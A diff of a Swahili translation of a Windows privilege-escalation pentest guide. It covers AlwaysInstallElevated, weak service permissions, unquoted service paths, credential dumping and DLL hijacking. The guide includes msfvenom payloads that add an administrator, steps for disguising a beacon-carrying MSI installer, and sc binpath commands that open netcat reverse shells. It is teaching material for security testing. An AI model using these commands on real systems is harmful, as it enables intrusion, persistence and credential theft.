yanatimizwa kwa **default settings**. +Kuna udhaifu wa **local privilege escalation** katika mazingira ya Windows **domain** chini ya masharti maalum. Masharti haya yanajumuisha mazingira ambapo **LDAP signing is not enforced,** watumiaji wana haki za kujitegemea zinazowawezesha kusanidi **Resource-Based Constrained Delegation (RBCD),** na uwezo wa watumiaji kuunda kompyuta ndani ya domain. Ni muhimu kutambua kwamba mahitaji haya yanatimizwa kwa kutumia **default settings**. 
-Find the **exploit in** [**https://github.com/Dec0ne/KrbRelayUp**](https://github.com/Dec0ne/KrbRelayUp) +Pata **exploit** katika [**https://github.com/Dec0ne/KrbRelayUp**](https://github.com/Dec0ne/KrbRelayUp) -Kwa taarifa zaidi kuhusu mtiririko wa attack angalia [https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/](https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/) +Kwa taarifa zaidi kuhusu mtiririko wa shambulio angalia [https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/](https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/) ## AlwaysInstallElevated -**If** hizi registry mbili ziko **enabled** (thamani ni **0x1**), basi watumiaji wa aina yoyote ya ruhusa wanaweza **install** (execute) `*.msi` files kama NT AUTHORITY\\**SYSTEM**. +**Ikiwa** vigezo hivi viwili vya rejista vimewezeshwa (thamani ni **0x1**), basi watumiaji wa ngazi yoyote ya ruhusa wanaweza **kufunga** (kutekeleza) faili za `*.msi` kama NT AUTHORITY\\**SYSTEM**. ```bash reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 
@@ -223,19 +231,20 @@ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallEle msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted ``` -Iwapo una kikao cha meterpreter unaweza kuendesha kiotomatiki mbinu hii kwa kutumia module **`exploit/windows/local/always_install_elevated`** +Ikiwa una meterpreter session unaweza kuotomatisha mbinu hii kwa kutumia module **`exploit/windows/local/always_install_elevated`** ### PowerUP -Tumia amri ya `Write-UserAddMSI` kutoka power-up kuunda ndani ya saraka ya sasa binari ya Windows MSI ili kupandisha ruhusa. Script hii inaandika msanidi MSI uliotangulia ambayo itauliza kuongeza mtumiaji/kikundi (hivyo utahitaji GIU access): +Tumia amri `Write-UserAddMSI` kutoka power-up kuunda ndani ya saraka ya sasa binary ya Windows MSI ili kuinua vibali. Script hii inaandika msanidi MSI uliotayarishwa awali ambao utauliza kuongeza mtumiaji/kikundi (hivyo utahitaji GIU access): ``` Write-UserAddMSI ``` -Tekeleza tu binary iliyoundwa ili kuongeza ruhusa. +Tekeleza tu binary iliyoundwa ili escalate privileges. ### MSI Wrapper -Soma mafunzo haya kujifunza jinsi ya kuunda MSI wrapper kwa kutumia zana hizi. Kumbuka unaweza kufunika faili "**.bat**" ikiwa unataka **tu** **kutekeleza** **mistari ya amri** +Soma mafunzo haya ili ujifunze jinsi ya kuunda MSI wrapper kwa kutumia zana hizi. Kumbuka unaweza ku-wrap faili ya "**.bat**" ikiwa unataka tu ku-execute **command lines** + {{#ref}} msi-wrapper.md 
@@ -250,44 +259,44 @@ create-msi-with-wix.md ### Create MSI with Visual Studio -- **Tengeneza** kwa Cobalt Strike au Metasploit **new Windows EXE TCP payload** katika `C:\privesc\beacon.exe` -- Fungua **Visual Studio**, chagua **Create a new project** na andika "installer" kwenye kisanduku cha utaftaji. Chagua mradi wa **Setup Wizard** na bonyeza **Next**. -- Mpatie mradi jina, kama **AlwaysPrivesc**, tumia **`C:\privesc`** kwa eneo, chagua **place solution and project in the same directory**, na bonyeza **Create**. -- Endelea kubonyeza **Next** hadi ufike hatua ya 3 kati ya 4 (chagua faili za kujumuisha). Bonyeza **Add** na chagua Beacon payload uliyounda. Kisha bonyeza **Finish**. -- Chagua mradi wa **AlwaysPrivesc** katika **Solution Explorer** na kwenye **Properties**, badilisha **TargetPlatform** kutoka **x86** hadi **x64**. -- Kuna mali nyingine unaweza kubadilisha, kama **Author** na **Manufacturer** ambazo zinaweza kufanya app iliyosakinishwa ionekane halali zaidi. -- Bonyeza kulia kwenye mradi na chagua **View > Custom Actions**. -- Bonyeza kulia **Install** na chagua **Add Custom Action**. -- Bonyeza mara mbili kwenye **Application Folder**, chagua faili yako ya **beacon.exe** na bonyeza **OK**. Hii itahakikisha Beacon payload inatekelezwa mara tu installer inapoendeshwa. +- **Tengeneza** na Cobalt Strike au Metasploit payload mpya ya **Windows EXE TCP** katika `C:\privesc\beacon.exe` +- Fungua **Visual Studio**, chagua **Create a new project** na andika "installer" kwenye kisanduku cha utafutaji. Chagua mradi wa **Setup Wizard** na bonyeza **Next**. +- Mpa mradi jina, kama **AlwaysPrivesc**, tumia **`C:\privesc`** kwa eneo, chagua **place solution and project in the same directory**, na bonyeza **Create**. +- Endelea kubofya **Next** hadi ufike hatua ya 3 ya 4 (choose files to include). Bonyeza **Add** na chagua Beacon payload uliyoiunda. Kisha bonyeza **Finish**. 
+- Chagua mradi **AlwaysPrivesc** katika **Solution Explorer** na kwenye **Properties**, badilisha **TargetPlatform** kutoka **x86** hadi **x64**. +- Kuna mali nyingine unaweza kubadilisha, kama **Author** na **Manufacturer** ambazo zinaweza kufanya programu iliyosakinishwa ionekane halali zaidi. +- Bofya kulia mradi na chagua **View > Custom Actions**. +- Bofya kulia **Install** na chagua **Add Custom Action**. +- Bonyeza mara mbili **Application Folder**, chagua faili yako **beacon.exe** na bonyeza **OK**. Hii itahakikisha kwamba beacon payload itaendeshwa mara installer itakapotekelezwa. - Chini ya **Custom Action Properties**, badilisha **Run64Bit** kuwa **True**. -- Mwishowe, **build it**. +- Hatimaye, **build it**. - Ikiwa onyo `File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86'` linaonekana, hakikisha umeweka platform kuwa x64. ### MSI Installation -Ili kutekeleza **installation** ya faili hatari `.msi` kwa **background:** +Ili kuendesha **installation** ya faili hatarishi `.msi` kwa background: ``` msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi ``` -Ili exploit udhaifu huu, unaweza kutumia: _exploit/windows/local/always_install_elevated_ +Ili exploit udhaifu huu unaweza kutumia: _exploit/windows/local/always_install_elevated_ ## Antivirus na Vichunguzi ### Mipangilio ya Ukaguzi -Mipangilio hii inaamua nini kinachokuwa **logged**, hivyo unapaswa kuzingatia. +Mipangilio hii inaamua kile kinachorekodiwa (**kinachorekodiwa**), hivyo unapaswa kuwa makini ``` reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit ``` ### WEF -Windows Event Forwarding, inavutia kujua logs zinatumwa wapi +Windows Event Forwarding — ni muhimu kujua wapi logs zinatumwa. 
```bash reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager ``` ### LAPS -**LAPS** imeundwa kwa ajili ya **management of local Administrator passwords**, kuhakikisha kuwa kila nenosiri ni **unique, randomised, and regularly updated** kwenye kompyuta zinazounganishwa kwenye domain. Nywila hizi zinahifadhiwa kwa usalama ndani ya Active Directory na zinaweza kupatikana tu na watumiaji ambao wamepewa ruhusa za kutosha kupitia ACLs, kuwaruhusu kuona local admin passwords ikiwa wameidhinishwa. +**LAPS** imeundwa kwa ajili ya usimamizi wa nywila za local Administrator, kuhakikisha kuwa kila nywila ni ya kipekee, ya kiholela, na inasasishwa mara kwa mara kwenye kompyuta zilizounganishwa kwenye domain. Nywila hizi zinahifadhiwa kwa usalama ndani ya Active Directory na zinaweza kufikiwa tu na watumiaji waliopewa ruhusa za kutosha kupitia ACLs, wakiruhusiwa kuona local admin passwords ikiwa wameidhinishwa. {{#ref}} 
@@ -296,36 +305,36 @@ reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\Subs ### WDigest -Ikiwa imewezeshwa, **plain-text passwords are stored in LSASS** (Local Security Authority Subsystem Service).\ +Ikiwa imewezeshwa, **plain-text passwords zinahifadhiwa katika LSASS** (Local Security Authority Subsystem Service).\ [**More info about WDigest in this page**](../stealing-credentials/credentials-protections.md#wdigest). ```bash reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential ``` ### LSA Protection -Kuanzia na **Windows 8.1**, Microsoft ilianzisha ulinzi ulioboreshwa kwa Local Security Authority (LSA) ili **kuzuia** jaribio la michakato isiyoaminika **kusoma kumbukumbu yake** au kuingiza code, na hivyo kuimarisha usalama wa mfumo.\ +Kuanzia **Windows 8.1**, Microsoft ilianzisha ulinzi ulioboreshwa kwa Local Security Authority (LSA) ili **kuzuia** jaribio la michakato isiyo ya kuaminika **kusoma kumbukumbu yake** au kuingiza code, ikiboresha usalama wa mfumo.\ [**More info about LSA Protection here**](../stealing-credentials/credentials-protections.md#lsa-protection). ```bash reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL ``` ### Credentials Guard -**Credential Guard** ilianzishwa katika **Windows 10**. Madhumuni yake ni kulinda credentials zilizohifadhiwa kwenye kifaa dhidi ya vitisho kama pass-the-hash attacks.| [**More info about Credentials Guard here.**](../stealing-credentials/credentials-protections.md#credential-guard) +**Credential Guard** ilianzishwa katika **Windows 10**. 
Kusudi lake ni kulinda credentials zilizohifadhiwa kwenye kifaa dhidi ya vitisho kama pass-the-hash attacks.| [**More info about Credentials Guard here.**](../stealing-credentials/credentials-protections.md#credential-guard) ```bash reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags ``` ### Cached Credentials -**Domain credentials** zinathibitishwa na **Local Security Authority** (LSA) na hutumika na vipengele vya mfumo wa uendeshaji. Wakati data za kuingia za mtumiaji zinapothibitishwa na registered security package, **domain credentials** kwa mtumiaji kwa kawaida huanzishwa.\ +**Domain credentials** zinathibitishwa na **Local Security Authority** (LSA) na zinatumika na vipengele vya mfumo wa uendeshaji. Wakati data ya kuingia ya mtumiaji inathibitishwa na kifurushi cha usalama kilichosajiliwa, domain credentials kwa mtumiaji kawaida huanzishwa.\ [**More info about Cached Credentials here**](../stealing-credentials/credentials-protections.md#cached-credentials). ```bash reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT ``` -## Watumiaji na Makundi +## Watumiaji & Vikundi -### Orodhesha Watumiaji na Makundi +### Orodhesha Watumiaji & Vikundi -Unapaswa kukagua kama katika makundi unayomo kuna ruhusa za kuvutia +Unapaswa kuangalia kama kuna vikundi ambavyo uko ndani yake vinavyo ruhusa zenye kuvutia ```bash # CMD net users %username% #Me 
@@ -340,31 +349,31 @@ Get-LocalUser | ft Name,Enabled,LastLogon Get-ChildItem C:\Users -Force | select Name Get-LocalGroupMember Administrators | ft Name, PrincipalSource ``` -### Vikundi vya walio na ruhusa za juu +### Privileged groups -Ikiwa **uko katika kundi fulani la walio na ruhusa za juu unaweza kupandisha ruhusa**. Jifunze kuhusu vikundi vya walio na ruhusa za juu na jinsi ya kuvifanyia matumizi mabaya ili kupandisha ruhusa hapa: +Ikiwa wewe **belongs to some privileged group you may be able to escalate privileges**. Jifunze kuhusu privileged groups na jinsi ya kuvitumia ili escalate privileges hapa: {{#ref}} ../active-directory-methodology/privileged-groups-and-token-privileges.md {{#endref}} -### Uendeshaji wa token +### Token manipulation **Jifunze zaidi** kuhusu ni nini **token** kwenye ukurasa huu: [**Windows Tokens**](../authentication-credentials-uac-and-efs/index.html#access-tokens).\ -Tazama ukurasa uliofuata ili **ujifunze kuhusu tokens zinazovutia** na jinsi ya kuzitumia vibaya: +Angalia ukurasa ufuatao ili **learn about interesting tokens** na jinsi ya kuvitumia: {{#ref}} privilege-escalation-abusing-tokens.md {{#endref}} -### Watumiaji walioingia / Vikao +### Logged users / Sessions ```bash qwinsta klist sessions ``` -### Folda za nyumbani +### Mafolda ya nyumbani ```bash dir C:\Users Get-ChildItem C:\Users 
@@ -377,12 +386,12 @@ net accounts ```bash powershell -command "Get-Clipboard" ``` -## Michakato Inayoendelea +## Mchakato Zinazokimbia -### Ruhusa za Faili na Folda +### Ruhusa za Faili na Saraka -Kwanza kabisa, kwa kuorodhesha michakato **angalia passwords ndani ya mstari wa amri wa mchakato**.\ -Angalia ikiwa unaweza **kuandika juu ya binary inayokimbia** au ikiwa una ruhusa za kuandika kwa folda ya binary ili kufaidika na [**DLL Hijacking attacks**](dll-hijacking/index.html): +Kwanza kabisa, ukiorodhesha michakato **angalia passwords ndani ya command line ya mchakato**.\ +Angalia ikiwa unaweza **overwrite some binary running** au ikiwa una ruhusa ya kuandika katika saraka ya binary ili ku-exploit uwezekano wa [**DLL Hijacking attacks**](dll-hijacking/index.html): ```bash Tasklist /SVC #List processes running and services tasklist /v /fi "username eq system" #Filter "system" processes @@ -393,7 +402,7 @@ Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "sv #Without usernames Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id ``` -Daima angalia uwezekano wa [**electron/cef/chromium debuggers** zinazokimbia; unaweza kuvitumia vibaya kuongezea ruhusa](../../linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md). +Daima angalia kama [**electron/cef/chromium debuggers** zinaendeshwa; unaweza kuzitumia vibaya kupandisha ruhusa](../../linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md). **Kukagua ruhusa za binaries za michakato** ```bash 
@@ -412,49 +421,49 @@ icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone todos %username%" && echo. ) ``` -### Uchimbaji wa password za kumbukumbu +### Memory Password mining -Unaweza kuunda dump ya kumbukumbu ya mchakato unaoendelea kwa kutumia **procdump** kutoka kwa sysinternals. Huduma kama FTP zina **credentials katika maandishi wazi kwenye kumbukumbu**, jaribu kufanya dump ya kumbukumbu na kusoma credentials. +Unaweza kuunda memory dump ya mchakato unaoendelea kwa kutumia **procdump** kutoka sysinternals. Huduma kama FTP huwa na **credentials in clear text in memory**, jaribu ku-dump memory na kusoma credentials. ```bash procdump.exe -accepteula -ma ``` ### Programu za GUI zisizo salama -**Programu zinazotendeshwa kama SYSTEM zinaweza kumruhusu mtumiaji kuanzisha CMD, au kuvinjari saraka.** +**Programu zinazoendesha kama SYSTEM zinaweza kumruhusu mtumiaji kuanzisha CMD, au kuvinjari saraka.** -Mfano: "Windows Help and Support" (Windows + F1), tafuta "command prompt", bonyeza kwenye "Click to open Command Prompt" +Mfano: "Windows Help and Support" (Windows + F1), tafuta "command prompt", bonyeza "Click to open Command Prompt" -## Huduma +## Services -Pata orodha ya huduma: +Pata orodha ya services: ```bash net start wmic service list brief sc query Get-Service ``` -### Permissions +### Ruhusa -Unaweza kutumia **sc** kupata taarifa za huduma +Unaweza kutumia **sc** kupata taarifa za service ```bash sc qc ``` -Inashauriwa kuwa na binary **accesschk** kutoka _Sysinternals_ ili kukagua ngazi ya ruhusa inayohitajika kwa kila huduma. +Inashauriwa kuwa na binary **accesschk** kutoka _Sysinternals_ ili kuangalia ngazi ya ruhusa inayohitajika kwa kila huduma. 
```bash accesschk.exe -ucqv #Check rights for different groups ``` -Inashauriwa kukagua ikiwa "Authenticated Users" wanaweza kubadilisha huduma yoyote: +Inapendekezwa kuangalia kama "Authenticated Users" wanaweza kubadilisha huduma yoyote: ```bash accesschk.exe -uwcqv "Authenticated Users" * /accepteula accesschk.exe -uwcqv %USERNAME% * /accepteula accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version ``` -[Unaweza kupakua accesschk.exe kwa XP hapa](https://github.com/ankh2054/windows-pentest/raw/master/Privelege/accesschk-2003-xp.exe) +[You can download accesschk.exe for XP for here](https://github.com/ankh2054/windows-pentest/raw/master/Privelege/accesschk-2003-xp.exe) ### Wezesha huduma -Ikiwa unapata kosa hili (kwa mfano na SSDPSRV): +Ikiwa unapata hitilafu hii (kwa mfano na SSDPSRV): _System error 1058 has occurred._\ _The service cannot be started, either because it is disabled or because it has no enabled devices associated with it._ 
@@ -464,15 +473,15 @@ Unaweza kuiwezesha kwa kutumia sc config SSDPSRV start= demand sc config SSDPSRV obj= ".\LocalSystem" password= "" ``` -**Kumbuka kwamba huduma upnphost inategemea SSDPSRV ili ifanye kazi (kwa XP SP1)** +**Zingatia kwamba huduma upnphost inategemea SSDPSRV ili ifanye kazi (for XP SP1)** -**Njia mbadala nyingine** ya tatizo hili ni kuendesha: +**Njia nyingine mbadala** ya tatizo hili ni kuendesha: ``` sc.exe config usosvc start= auto ``` ### **Badilisha njia ya binary ya huduma** -Katika tukio ambapo kundi la "Authenticated users" lina **SERVICE_ALL_ACCESS** kwenye huduma, inawezekana kubadilisha binary inayotekelezwa ya huduma. Ili kubadilisha na kutekeleza **sc**: +Katika hali ambapo kundi la "Authenticated users" lina **SERVICE_ALL_ACCESS** kwenye huduma, kubadilisha binary inayotekelezwa ya huduma inawezekana. Ili kubadilisha na kuendesha **sc**: ```bash sc config binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe" sc config binpath= "net localgroup administrators username /add" 
@@ -480,25 +489,25 @@ sc config binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cm sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe" ``` -### Anzisha upya huduma +### Anzisha tena huduma ```bash wmic service NAMEOFSERVICE call startservice net stop [service name] && net start [service name] ``` -Inawezekana kupata ruhusa za juu kupitia ruhusa mbalimbali: +Madaraka yanaweza kupandishwa kupitia ruhusa mbalimbali: -- **SERVICE_CHANGE_CONFIG**: Inaruhusu kurekebisha usanidi wa binary ya service. -- **WRITE_DAC**: Inaruhusu upya wa ruhusa, ikiruhusu kubadilisha usanidi wa service. -- **WRITE_OWNER**: Inaruhusu upataji umiliki na kurekebisha ruhusa. +- **SERVICE_CHANGE_CONFIG**: Inaruhusu kurekebisha upya binary ya service. +- **WRITE_DAC**: Inawezesha kurekebisha ruhusa, jambo linalowezesha kubadilisha usanidi wa service. +- **WRITE_OWNER**: Inaruhusu kupata umiliki na kurekebisha ruhusa. - **GENERIC_WRITE**: Inarithi uwezo wa kubadilisha usanidi wa service. - **GENERIC_ALL**: Pia inarithi uwezo wa kubadilisha usanidi wa service. -Kwa utambuzi na matumizi ya udhaifu huu, _exploit/windows/local/service_permissions_ inaweza kutumika. +Kwa kugundua na kutumia udhaifu huu, _exploit/windows/local/service_permissions_ inaweza kutumika. 
-### Ruhusa dhaifu za binaries za service +### Services binaries weak permissions -**Angalia kama unaweza kubadilisha binary inayotekelezwa na service** au ikiwa una **uruhusa za kuandika kwenye folda** ambapo binary iko ([**DLL Hijacking**](dll-hijacking/index.html))**.**\ -Unaweza kupata kila binary inayotekelezwa na service kwa kutumia **wmic** (not in system32) na kuangalia ruhusa zako kwa kutumia **icacls**: +**Angalia kama unaweza kubadilisha binary inayotekelezwa na service** au kama una **ruhusa za kuandika kwenye folda** ambapo binary iko ([**DLL Hijacking**](dll-hijacking/index.html))**.**\ +Unaweza kupata kila binary inayotekelezwa na service kwa kutumia **wmic** (not in system32) na ukakague ruhusa zako kwa kutumia **icacls**: ```bash for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt @@ -510,10 +519,10 @@ sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt ``` -### Services registry modify permissions +### Ruhusa za kubadilisha service registry Unapaswa kuangalia kama unaweza kubadilisha service registry yoyote.\ -Unaweza **kuangalia** **uruhusa** zako juu ya service **registry** kwa kufanya: +Unaweza **kuangalia** **uruhusa** zako kwenye service **registry** kwa kufanya: ```bash reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services 
@@ -522,16 +531,15 @@ for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\ get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i " Users Path Everyone" ``` -Inapaswa kukaguliwa kama **Authenticated Users** au **NT AUTHORITY\INTERACTIVE** wanamiliki ruhusa za `FullControl`. Ikiwa hivyo, binary inayotekelezwa na service inaweza kubadilishwa. +Inapaswa kuangaliwa ikiwa **Authenticated Users** au **NT AUTHORITY\INTERACTIVE** wana ruhusa za `FullControl`. Ikiwa hivyo, binary inayotekelezwa na service inaweza kubadilishwa. -Ili kubadilisha njia ya binary inayotekelezwa: +Ili kubadilisha Path ya binary inayotekelezwa: ```bash reg add HKLM\SYSTEM\CurrentControlSet\services\ /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f ``` -### Ruhusa za AppendData/AddSubdirectory kwenye rejista ya Services - -Kama una ruhusa hii kwenye rejista, inamaanisha kuwa **unaweza kuunda rejista ndogo kutoka hii**. Katika kesi ya Windows services, hili ni **enough to execute arbitrary code:** +### Idhini za AppendData/AddSubdirectory kwenye rejista ya Services +Ikiwa una idhini hii kwenye rejista, hii inamaanisha **unaweza kuunda rejista ndogo kutoka hii**. Katika kesi ya Windows services hili ni **la kutosha kutekeleza msimbo wowote:** {{#ref}} appenddata-addsubdirectory-permission-over-service-registry.md 
@@ -539,15 +547,15 @@ appenddata-addsubdirectory-permission-over-service-registry.md ### Njia za Service zisizo na nukuu -Ikiwa path ya executable haiko ndani ya nukuu, Windows itajaribu kutekeleza kila sehemu kabla ya nafasi. +Ikiwa njia kuelekea executable haiko ndani ya nukuu, Windows itajaribu kutekeleza kila sehemu inayomalizika kabla ya nafasi. -Kwa mfano, kwa path _C:\Program Files\Some Folder\Service.exe_ Windows itajaribu kutekeleza: +Kwa mfano, kwa njia _C:\Program Files\Some Folder\Service.exe_ Windows itajaribu kutekeleza: ```bash C:\Program.exe C:\Program Files\Some.exe C:\Program Files\Some Folder\Service.exe ``` -Orodhesha njia zote za huduma zisizo na nukuu, ukiondoa zile za huduma za Windows zilizojengwa: +Orodhesha njia zote za huduma zisizo na nukuu, ukiziondoa zile zinazomilikiwa na huduma za msingi za Windows: ```bash wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v '\"' wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v '\"' # Not only auto services 
@@ -567,19 +575,19 @@ echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && ```bash gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name ``` -**Unaweza kugundua na ku-exploit** udhaifu huu kwa metasploit: `exploit/windows/local/trusted\_service\_path` Unaweza kuunda kwa mikono binari ya huduma kwa metasploit: +**Unaweza kugundua na kutumia** udhaifu huu kwa metasploit: `exploit/windows/local/trusted\_service\_path` Unaweza kutengeneza kwa mkono service binary kwa metasploit: ```bash msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe ``` -### Hatua za Urejesho +### Hatua za kurejesha -Windows inaruhusu watumiaji kubainisha hatua zitakazochukuliwa ikiwa service itashindwa. Kipengele hiki kinaweza kusanidiwa kuelekeza kwa binary. Ikiwa binary hii inaweza kubadilishwa, privilege escalation inaweza kuwa inawezekana. Maelezo zaidi yanaweza kupatikana kwenye [nyaraka rasmi](). +Windows inaruhusu watumiaji kubainisha hatua ambazo zitatumika ikiwa huduma itashindikana. Kipengele hiki kinaweza kusanidiwa kuashiria binary. Iwapo binary hii inaweza kubadilishwa, privilege escalation inawezekana. Maelezo zaidi yanaweza kupatikana katika [nyaraka rasmi](). ## Programu -### Programu Zilizowekwa +### Programu zilizowekwa -Angalia **permissions of the binaries** (labda unaweza overwrite moja na escalate privileges) na of the **folders** ([DLL Hijacking](dll-hijacking/index.html)). +Angalia **ruhusa za binaries** (labda unaweza kuandika juu ya moja na ku-escalate privileges) na za **folda** ([DLL Hijacking](dll-hijacking/index.html)). ```bash dir /a "C:\Program Files" dir /a "C:\Program Files (x86)" 
@@ -590,9 +598,9 @@ Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name ``` ### Ruhusa za Kuandika -Angalia kama unaweza kubadilisha faili fulani ya usanidi ili kusoma faili maalum au kama unaweza kubadilisha binary itakayotekelezwa na akaunti ya Administrator (schedtasks). +Angalia kama unaweza kubadilisha baadhi ya config file ili kusoma faili maalum au kama unaweza kubadilisha binary itakayotekelezwa na akaunti ya Administrator (schedtasks). -Njia ya kupata ruhusa dhaifu za folda/faili kwenye mfumo ni kufanya: +Njia mojawapo ya kupata ruhusa dhaifu za folda/faili kwenye mfumo ni kufanya: ```bash accesschk.exe /accepteula # Find all weak folder permissions per drive. @@ -615,10 +623,10 @@ Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Ac Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}} ``` -### Endeshwa wakati wa kuanzishwa +### Run at startup -**Angalia ikiwa unaweza kuandika upya registry au binary fulani ambazo zitaendeshwa na mtumiaji tofauti.**\ -**Soma** ukurasa **ufuatao** ili ujifunze zaidi kuhusu maeneo ya autoruns yenye kuvutia ya kupandisha vibali: +**Angalia ikiwa unaweza overwrite baadhi ya registry au binary ambayo itatekelezwa na mtumiaji mwingine.**\ +**Soma** ukurasa **ufuatao** ili kujifunza zaidi kuhusu **autoruns locations to escalate privileges**: {{#ref}} 
@@ -627,13 +635,13 @@ privilege-escalation-with-autorun-binaries.md ### Madereva -Tafuta madereva ya **pande za tatu zisizo za kawaida/zinazoweza kuwa na udhaifu** +Tafuta madereva ya **third party weird/vulnerable** ```bash driverquery driverquery.exe /fo table driverquery /SI ``` -Ikiwa driver huweka wazi arbitrary kernel read/write primitive (kawaida katika IOCTL handlers zilizobuniwa vibaya), unaweza escalate kwa kuiba SYSTEM token moja kwa moja kutoka kernel memory. Angalia mbinu hatua‑kwa‑hatua hapa: +Iwapo driver inatoa arbitrary kernel read/write primitive (kawaida katika IOCTL handlers zilizotengenezwa vibaya), unaweza kupandisha hadhi kwa kuiba SYSTEM token moja kwa moja kutoka kernel memory. Tazama mbinu ya hatua‑kwa‑hatua hapa: {{#ref}} arbitrary-kernel-rw-token-theft.md @@ -642,9 +650,9 @@ arbitrary-kernel-rw-token-theft.md ## PATH DLL Hijacking -Ikiwa una **write permissions inside a folder present on PATH**, unaweza kuwa na uwezo wa hijack a DLL loaded by a process na **escalate privileges**. +Ikiwa una **uruhusa za kuandika ndani ya folda iliyo kwenye PATH**, unaweza kuwa na uwezo wa hijack DLL inayopakiwa na process na **escalate privileges**. -Angalia ruhusa za folda zote ndani ya PATH: +Kagua ruhusa za folda zote ndani ya PATH: ```bash for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. ) ``` @@ -656,7 +664,7 @@ dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md ## Mtandao -### Shares +### Sehemu zilizoshirikiwa ```bash net view #Get a list of computers net view /all /domain [domainname] #Shares on the domains 
@@ -666,19 +674,19 @@ net share #Check current shares ``` ### hosts file -Angalia kompyuta nyingine zinazojulikana zilizowekwa hardcoded kwenye hosts file +Angalia kompyuta nyingine zinazojulikana zilizohardcoded kwenye hosts file ``` type C:\Windows\System32\drivers\etc\hosts ``` -### Kiolesura za Mtandao & DNS +### Violesura vya Mtandao & DNS ``` ipconfig /all Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address Get-DnsClientServerAddress -AddressFamily IPv4 | ft ``` -### Bandari Zilizo wazi +### Bandari Wazi -Angalia **huduma zilizo na vizuizi** kutoka nje +Angalia huduma **zilizo na vikwazo** kutoka nje ```bash netstat -ano #Opened ports? ``` 
